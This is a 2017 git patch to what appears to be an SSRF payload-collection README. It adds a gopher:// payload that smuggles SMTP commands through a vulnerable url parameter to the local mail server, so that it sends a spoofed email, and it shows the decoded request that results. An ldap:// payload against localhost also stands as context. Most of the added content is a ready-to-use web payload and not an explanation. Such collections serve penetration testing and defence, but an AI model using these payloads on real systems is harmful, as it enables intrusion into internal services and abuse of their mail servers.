From e7cb8a2ce19f6a7a1b51b258d3d26e0f7d876af6 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Tue, 19 Sep 2017 20:35:18 +0200
Subject: [PATCH] SSRF - Gopher Protocol

---
 SSRF injection/README.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 2af9a6c..2ae9c1f 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -94,6 +94,26 @@ Ldap://
 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 ```
+Gopher://
+```
+ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
+
+will make a request like
+HELO localhost
+MAIL FROM:
+RCPT TO:
+DATA
+From: [Hacker]
+To:
+Date: Tue, 15 Sep 2017 17:20:26 -0400
+Subject: Ah Ah AH
+
+You didn't say the magic word !
+
+
+.
+QUIT
+```
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
@@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
 * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
 * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
+* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)